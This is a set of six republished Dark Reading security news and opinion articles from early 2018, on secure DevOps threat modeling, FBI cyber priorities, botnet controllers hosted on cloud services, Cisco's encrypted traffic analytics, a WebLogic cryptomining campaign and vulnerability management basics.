STE WILLIAMS

Continuous delivery (CD) is becoming the cornerstone of modern software development, enabling organizations to ship — in small increments — new features and functionality to customers faster to meet market demands. CD is achieved by applying DevOps practices and principles (continuous integration and continuous deployment) from development to operations. There is no continuous delivery without implementing DevOps practices and principles. By that, I mean strong communication and collaboration across teams, and automation across testing, build, and deployment pipelines. But often achieving continuous delivery to meet market demands presents numerous challenges for security. 

While DevOps principles and practices acknowledge the need for security, many organizations struggle to find the right fit and speed for integrating security into DevOps. In a study conducted by HP Enterprise, 99% of respondents say that while DevOps culture offers the opportunity to improve application security practices, only 20% of respondents say that secure systems development life cycle (SDLC) testing is done throughout their development process. (Read “Software Assurance: Thinking Back, Looking Forward.”)

Security is still trying to catch up with all the innovative software being developed, tested, deployed, and delivered without slowing or bogging down the process. Security has to be intrinsic and transparent yet visible enough in the process that it is a “shared” responsibility at the heart of DevOps practices and principles. So when a product owner describes new features and functionality that need to be added to the next release, everyone thinks about ways in which those features and functionality can be designed and implemented securely to reduce exposures and vulnerabilities. This is what it means to “Shift Left.”

I often hear that slogan in the industry: “Shift Left.” Most of the time the term is used in reference to moving security testing into continuous integration. While I agree that security testing as part of continuous integration is important, it’s way too late at that point in time. “Shift Left” must go far left, past continuous integration into the requirements and design phases. “Shift Left” to me is a mindset that thinks about security from the onset and is pervasive throughout the software development process. This is what it means to build “security in.”

When you start far left, you have the opportunity to embed the appropriate security lexicon and security considerations into the requirements phase. Starting with really solid security requirements allows organizations to codify their intuitions into design; it enables organizations to make sound design decisions up front that will help eliminate technical debt and reduce the cost to maintain software.

Codifying intuitions is a concept I got from a colleague of mine, David Molnar, a security researcher from Microsoft, in a talk about what security can learn from AI. The concept of “codifying your intuitions” was used in a larger context to the security domain, but also, specifically, to defending against adversarial activity and advanced persistent threats in a talk by security researcher Taesoo Kim. I like the concept because it reinforces the need to think like an adversary and infer some of our intuitions and assumptions not only into security design but also into developers’ daily activities. Kim gives an example in his talk about what led Jung Hoon Lee, a notable bug bounty hunter, to find vulnerabilities at the Pwn20wn 2016 hacking contest. Lee attributes the discovery of exploitable vulnerabilities to his “intuition.” 

The Gift of Intuition
Experience in the trenches working in security, developing software, breaking software, and protecting software forms patterns in our minds that provide a solid foundation from which we can train our minds and mental capacities to recognize and be more aware. I tend to look at intuition as the revelations about the mental patterns we accumulate over time; intuition forms from the right hemisphere of the brain (the creativity region) and inspires ingenuity. As with many complex problems in cybersecurity, solutions to those problems often require some level of curiosity and creativity to decompose complexity. This same level of curiosity and creativity is what often motivates attackers. It must be applied to software development to help organizations shift their “security-minded thinking” all the way left.  

One of the keys to shifting left is figuring out how to codify intuitions into threat models that can be used to guide secure software development. This could be in the form of user stories and misuse/abuse cases that help organizations better understand how to securely design and implement features and functionality into software. These threat models can be used to:

• Guide product teams in making good design decisions regarding security features of the systems.
• Assist developers in understanding the consequences of their refactoring or development activities when implementing the design in code.
• Develop situational awareness about security threats and risks that can be used to guide more targeted and efficient security testing (achieving security “at-speed”) throughout the software development life cycle.

To help organizations formalize threat modeling activities into their SDLC, organizations should consider adopting the following practices and standards:

• Leverage Common Architectural Weakness Enumeration (CAWE) in formulating good user stories about new features and functionality. CAWE has been recently added into MITRE’s CWE 3.0 release. 
• For user stories, crosswalk CAPEC and ATTCK to codify intuitions in the development of misuse/abuse cases to better understand ways in which the system can be compromised and attacked.
• Once the security design has been validated and verified, use CWE to understand how to correctly implement the security design, along with the features and functionality into code. 

Shifting left is a mindset, a philosophy that emphasis the need to think about security (codify your intuitions) in all phases of the SDLC.  

Related Content:

• Software Assurance: Thinking Back, Looking Forward
• Why Security Depends on Usability — and How to Achieve Both
• Certifying Software: Why We’re Not There Yet

Kevin Greene is a thought leader in the area of software security assurance. He currently serves on the advisory board for New Jersey Institute of Technology (NJIT) Cybersecurity Research Center, and Bowie State University’s Computer Science department. Kevin has been very … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/shift-left-codifying-intuition-into-secure-devops/a/d-id/1330786?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

FBI Director Christopher Wray outlined a list of growing cybersecurity concerns his agency faces during a speech this week at the International Conference on Cyber Security in New York.

A rise in nation-state sponsored computer intrusion attacks, growing frequency in “blended threats” involving nation-states that hire cybercriminals to do the work, advancements in artificial intelligence, and the emergence of cryptocurrency, are all contributing to the concerns and challenges to the agency, Wray says.

He also cited an increase in the number of cases where the FBI was unable to access electronic evidence. Last fiscal year, the number of those type of cases included 7,775 devices. “The FBI supports information security measures, including strong encryption. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep this country safe,” he said.

Wray also highlighted improvements made to the agency’s cybersecurity operations. The FBI now assigns work based on an agent’s cybersecurity experience rather than jurisdiction; Cyber Action Teams have been formed for quick deployment; every field office has a Cyber Task Force; and indictments and US Treasury Department sanctions will be sought even if a defendant can’t be apprehended.

Read more about Wray’s comments here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/fbi-director-cryptocurrency-nation-state-attacks-among-agencys-top-cybersecurity-concerns/d/d-id/1330795?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Botnet controllers increased by 32% in 2017, and more cybercriminals are taking advantage of legitimate cloud providers like Amazon and Google to host them, researchers report.

The team at Spamhaus Malware Labs this week published its 2017 Botnet Threat Report, which digs into the numbers and trends behind botnet threats encountered throughout the year. In 2017, the company identified and issued Spamhaus Block List (SBL) listings for more than 9,500 botnet command-and-control (CC) servers on 1,122 different networks. SBL refers to a database of IP addresses from which the organization doesn’t recommend accepting mail.

As a means to control malware-infected machines and exfiltrate data, CC servers play a critical role in operations to distribute spam, ransomware, and banking Trojans, launch DDoS attacks, and mine cryptocurrencies like Bitcoin. Nearly every 7^th SBL listing was for a botnet controller.

Most (68%) of the controllers discovered in 2017 were hosted on servers ordered by attackers for the sole purpose of hosting botnet controllers. These servers are put on Spamhaus’ Botnet Controller List, which helps networks avoid traffic to/from botnets — because none of these IP addresses host legitimate services, they can be directly blocked on corporate networks without affecting real traffic. Spamhaus blacklisted an average of 600-700 servers per month in 2017.

Lawrence Orans, research vice president at Gartner with a focus on network security, says when it comes to botnets, most businesses are concerned about DDoS attacks.

“A shift in botnet activity came in the end of 2016, in September and October, with the emergence of the Mirai botnet and how that was used in a high-profile DDoS attack,” he explains. DDoSes remain the biggest botnet-related threat corporations face, and they should have mitigation capabilities in place from a service provider or content delivery network.

According to Spamhaus research, a standout trend from 2017 is the marked increase of botnet controllers hosted on legitimate cloud services. Most are on Amazon Web Services: Amazon alone hosted 303 CC servers in 2017 compared with 36 in 2016. However, analysis from earlier this year found Google’s cloud platform Compute Engine is also hosting more botnets.

Orans says this isn’t necessarily a “game-changing shift” given many modern security tools are designed to detect callbacks to CC servers. Detection wouldn’t be affected regardless of server location, he says.

Spamhaus notes some cloud providers have begun to deal with the problem of fake sign-ups, but others still struggle with the issue. Major cloud providers are “overwhelmed” by the large amount of fraudulent sign-ups on their networks in 2017, researchers explain.

Fraudulent sign-ups are one part of the growing botnet problem. Compromised servers and websites are another. It’s tough for ISPs or hosting providers to prevent compromise because servers and websites are mostly under customer control and many run outdated software. Cybercriminals can easily scan the Internet for these; open-source content management systems like WordPress, Drupal, Joomla, and Typo3 are all popular targets, Spamhaus reports.

Most malware associated with botnet controllers detected in 2017 were banking Trojans, particularly Chthonic, Gozi, Heodo, TrickBot, Dridex, Worm.Ramnit, AZORult, and PandaZeuS. Droppers/credential stealers were also common: Downloader.Pony, Loki, Smoke Loader, and Neutrino. Criminals also often distributed IoT malware, ransomware, and backdoors.

Spamhaus anticipates the growth of IoT threats will likely continue in 2018, and Orans agrees.

“For example, many home appliances lag in security protection, so they can be easily compromised by malware and become part of a botnet,” he says. “This is what we saw with the Mirai botnet in 2016.”

Further, Orans emphasizes the importance of knowing how to respond if your business is targeted with a DDoS attack. “Who’s going to interface with the public? Who’s going to interface with executives? You should have a playbook in place for a botnet-generated DDoS attack,” he says.

The person who interfaces with the board, and the public, following an attack will depend on the company’s size. Generally the person who speaks with the public will not be the security leader, Orans explains, but a communications professional or public relations representative.

Related Content:

• ‘Back to Basics’ Might Be Your Best Security Weapon
• Microsoft: How the Threat Landscape Will Shift This Year
• Meltdown, Spectre Likely Just Scratch the Surface of Microprocessor Vulnerabilities
• US Gov Outlines Steps to Fight Botnets, Automated Threats

Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Article source: https://www.darkreading.com/cloud/aws-google-cloud-popular-home-for-botnet-controllers/d/d-id/1330798?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

After months of field trials, Cisco now has moved to general availability its Encrypted Traffic Analytics (ETA) technology that addresses the increasingly critical security challenge of inspecting encrypted traffic for malicious activity – without first having to decrypt it.

In addition to its campus switches, ETA will also now be available with a majority of Cisco’s enterprise routing platforms including its branch office router, Integrated Services Router, and Cloud Services Routers, the company announced Jan 10.

Attackers have increasingly begun using encryption to hide payloads, command and control communications, data exfilitration, and other activity from conventional malware detection tools. The only way to inspect this traffic typically is to decrypt it first, which besides being technologically challenging can compromise the privacy of the encrypted traffic — a problem especially for organizations that are required to comply with certain data regulations. The US-CERT has even cautioned organizations about the dangers of implementing interception tools that weaken TLS security.

“The network is growing more and more opaque through encrypted transports,” says Cisco principal engineer TK Keanini. “When threat actors use encrypted transports their activities are hidden and we cannot afford for any malicious activity to be hidden, as this is the primary way they will persist in your network. “

A study conduced by Zscaler showed malicious threats using SSL encryption doubling in the first six months of last year. The security vendor reported blocking an average of 12,000 phishing attempts delivered over SSL/TLS every day — a 400% increase over the previous year.  

Many of the new malware strains that the company blocked last year used SSL to encrypt CC communications. Banking Trojans such as Dridex and Trickbot accounted for 60% of these payloads and ransomware accounted of 25% of the payloads using SSL/TLS encryption for CC activity.

“Seventy percent of the traffic that we are seeing in the Zscaler cloud is encrypted,” says Deepen Desai, Zscaler’s director of research and operations. “And 54% of the advanced threats Zscaler blocks are hidden inside SSL traffic, making clear that inspecting SSL traffic is no longer optional.”

Cisco’s ETA is designed to give organizations a way to detect and block such threats. ETA’s principal benefit, according to Cisco, is that it does not rely solely on decryption to inspect traffic.

Instead, the technique uses a combination of network telemetry and machine learning to look for differences between malicious and benign traffic in three specific features of encrypted data.

The first is the initial data packet of the connection, which often can contain important data about the rest of the encrypted content. Then it looks at the sequence of packet lengths and times for clues into traffic content that go beyond what is available in the initial packet. The third feature that ETA checks, is the byte distribution across the packet payloads within the encrypted traffic flow, according to the company.  ETA’s ability to spot the telltale signs of malware in encrypted traffic is based on research the company conducted into understanding the differences in how malicious and benign traffic uses TLS, DNS, and HTTP.

“Encrypted Traffic Analytics not only finds malicious activities with our decryption but it also helps organizations answer a critical question on a daily basis: How much of my digital business travels in the clear versus encrypted?” Keanini says.  The Cisco network itself is able deliver the needed telemetry for security thereby lowering administrative and operational costs, he says.

The essence of ETA is its ability to infer things from encrypted traffic, by passively monitoring it, rather than opening up and inspecting the contents. “Decryption is not a real option for many reasons,” Keanini says. “We need to respect encryption and privacy while finding other methods to detect through inference not direct inspection.”

According to Keanini, enterprises that have been testing ETA have reported gaining additional insight into what is encrypted on their network and the quality of that encryption as well.

The broader support for ETA announced this week means that enterprises can now get visibility into more of the encrypted traffic flowing across their networks. “All of these infrastructure software upgrades get you to a point where there is new telemetry being analyzed by Cisco Stealthwatch without the needs for decryption,” Keanini says.

Related Content:

• When Encryption Becomes The Enemy’s Best Friend
• How Hackers Hide Their Malware: Advanced Obfuscation
• US-CERT Warns That HTTPS Inspection Tools Weaken TLS
• GDPR Compliance: 5 Early Steps to Get Laggards Going 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/cisco-adds-encrypted-traffic-analysis-function/d/d-id/1330799?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Enterprises that failed to install Oracle’s critical WebLogic patch last October could find their PeopleSoft and cloud-based servers churning out cryptocurrency, a new discovery shows.

A security researcher found attackers had mined 611 Monero coins, which carries a current value of $226,070, by exploiting the WebLogic Flaw in vulnerable servers around the globe. Reports began to emerge earlier this week that a malicious campaign was underway to deploy Monero cryptocurrency miners on these unpatched systems, according to a blog post by Renato Marinho, chief research officer at Morphus Labs, who made the discovery.

The attackers were using a proof-of-concept exploit released in late December by Chinese researcher Lian Zhang that uses a critical vulnerability in the WebLogic app server; Oracle issued a patch for the flaw in October, says Johannes Ullrich, dean of research for SANS Technology Institute.

The exploit’s use of crypto mining was discovered in the past few weeks because it crashed several WebLogic servers, Ullrich explains. Crypto mining relies on lots of processing power generated by computers, servers, and even mobile devices, to mine crypto currency. As a result, computing systems can slow and crash when crypto miners are deployed.

In this recent case, the attackers were using the exploit solely to launch crypto miners on PeopleSoft and WebLogic app servers as well as Oracle and Amazon cloud environments that were tied to WebLogic app servers, Ullrich says. The attackers did not use the exploit to steal or alter valuable data and information contained in the PeopleSoft app servers.

PeopleSoft applications are widely used by enterprises, which rely on them to handle salesforce, human resources, financial planning, and other tasks.

“The attackers had access to all the information in PeopleSoft that is touching WebLogic servers, but rather than sell this information on the black market, which takes more work than writing a simple script to exploit the system and drop crypto mining software on it, they probably thought they could get more money by crypto mining,” Ullrich says.

Bitcoin, for example, has soared from $5,000 three months ago to close at $14,000 per coin on Tuesday.

If there is a crypto miner on a server, it means the bad guys found a way to exploit the system and may have further compromised it, Ullrich warns. As a result, companies need to dig deeper if they find a crypto miner on their system and not assume that’s the full extent of the attack.

Rick McElroy, security specialist at Carbon Black, expects more of these crypto mining attacks to increase this year as nation states, such as North Korea, get involved in cryptocurrency. “Mining will be a more prevalent problem because it now has become part of their economy, so you can expect more of these attacks abroad,” he says.

Deploying Oracle Patches

Enterprises tend to be slow in deploying Oracle updates, fearing it will break their mission-critical systems. “The Oracle and PeopleSoft ecosystems are very complex, and on top of that companies customize a lot of their code,” Ullrich says, estimating 10% to 20% of companies do not update when Oracle issues a patch.

Virtual patching by creating a Web application firewall is one workaround that enterprises may want to consider if they are hesitant to deploy an Oracle patch, advises Ullrich. “This type of patching is easy to do if you are trying to block a specific exploit,” he says. “It doesn’t work as well if you are trying to block all exploits in general because it may block something you want to allow in.”

Sebastian Bortnik, head of Onapsis Research Labs, says although enterprises have shown some improvement in recent years with patching business-critical applications, they remain far better at patching endpoints or OS layer patching.

“Despite that, some companies have improved and have started building repeatable patch schedules, and ensuring ERP systems have no more than three- to six months of pending patches,” Bortnik says.

Related Content:

• New Cryptocurrency Mining Malware Has Links to North Korea
• Cybercriminals Employ ‘Driveby’ Cryptocurrency Mining
• Harvest Season: Why Cyberthieves Want Your Compute Power

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/oracle-weblogic-exploit-used-in-cryptocurrency-mining-campaign/d/d-id/1330791?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Despite an influx of best-in-breed security technologies, organizations around the world are seeing a continued rise in cyber attacks. There are big implications. Financial consequences include immediate costs of investigating the breach and extend longer-term to include lawsuits and regulatory fines. Loss of customer trust can translate into declines in business. Perhaps most damaging is the impact of shutting down entire systems, which can grind operations to a halt. This is especially dangerous when the target is a critical healthcare, government, or utility provider.

From the high-profile Equifax breach to payment compromises at hotel chains and retailers, security teams are increasingly under pressure to not only determine why this is happening but what can be done to fix or prevent these problems. For many companies, getting “back to basics” could be one of the most effective weapons in the war on cyberattacks.

It’s About the Fundamentals
Spending more time on maturing and measuring fundamental security controls might have helped prevent many of the breaches we’ve seen recently. For instance, Equifax was compromised by a Web application vulnerability that had an available patch, which the company failed to employ. Too often companies underestimate basic security measures, instead prioritizing time and budget on the latest and greatest technology solutions.

Here are ways to stick to the basics of managing cyber-risk to better protect your company.

Achieve Visibility
This is one of the most challenging aspects of security, especially with dispersed assets. You can achieve greater visibility by leveraging these functionalities:

• Passive technologies that either live at the gateway or process log data are very effective at detecting when new devices come online and then triggering an active scan in order to provide more user information and context.
• Active scanning technologies that constantly poll your network will discover when new devices come online and report these assets back to a system of record where more information can be obtained from the user directories. An informed decision can then be made about whether or not the devices need to be passed along to the vulnerability management team.

Prioritize Vulnerability Management
Continuous assessments around known inventory can help lower the risk of exploitation. Many of the recent breaches resulting from the leaked Shadow Brokers’ tool sets could have been avoided, but too many organizations have weak vulnerability management platforms that leave critical systems exposed. The crippling of the UK’s National Health Service by the WannaCry ransomware attack, which targeted basic security weaknesses, was particularly egregious because of the direct impact on patient care.

A robust vulnerability management program can identify these issues so they can be patched, preventing them from being exploited. Some best practices include:

• Before even attempting a program, understand who is responsible for the functional areas of IT so the proper groups can be alerted when a vulnerability is identified.
• Obtain the correct buy-in from system owners that are going to be affected, which typically include those managing endpoints, servers and non-user devices such as printers and video cameras.
• Have clearly defined next steps once vulnerability is identified. Too often, companies recognize their vulnerabilities but have no action plan to move forward with patching, virtual patching, or another means of control.
• Patching servers and applications can inadvertently have a negative impact on business-critical applications resulting in system downtime. Yet, comprehensive patch management can be time-consuming. Putting a strong development team in place can accelerate the patch process. Alternatively, virtual patching can identify an active exploit and stop it at another layer, whether in the OS itself or at a network function or gateway.

Layer on Next-Gen Technology
With these baseline controls in place, next-generation threat prevention solutions such as anti-malware software, firewalls, and Web/email protections can be more successfully integrated into a company’s architecture and associated operational structure.

This is also critical as security solutions become even more sophisticated, sometimes combining different technologies into one more powerful platform. For instance, next-gen endpoints are more advanced than traditional endpoints, with machine learning, artificial intelligence, integration, and open APIs. But leveraging these features into an orchestrated operational model can add a certain level of complexity for analysts and operators, and care should be taken to ensure manual concepts and abilities are understood before employing these enhanced features.

Master Manual Processes Before You Automate
Automating certain security controls can be extremely beneficial, helping analysts more efficiently investigate and triage events by allowing multiple sources of records to be examined and providing context to determine the traffic, user, intellectual property on the device, and what it was doing before and after the event. But automation can also greatly increase risk if done too quickly. While it provides the heavy lifting, it will not make you an instant expert. You still need brains and smarts to accompany orchestration and automation. This means it’s much more effective and reliable to first create well-defined and tested manual processes before writing the appropriate automation scripts and playbooks.

While there’s no guaranteed security solution, a company’s ability to successfully reduce risk starts with building a solid security foundation. These baseline concepts are essential, and understanding the capabilities of technologies currently in place will help make operations more secure in the long term.

Related Content:

• The Internet of (Secure) Things Checklist
• In Mobile, It’s Back to the Future
• Post-Breach Carnage: Worst Ways the Axe Fell in 2017

Lee Waskevich, Vice President, Security Solutions at ePlus Technology, is responsible for overall strategy for the ePlus Security practice. Lee and his team design and deliver tailored cybersecurity programs aimed at mitigating business risk, fortifying digital … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/back-to-basics-might-be-your-best-security-weapon/a/d-id/1330767?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple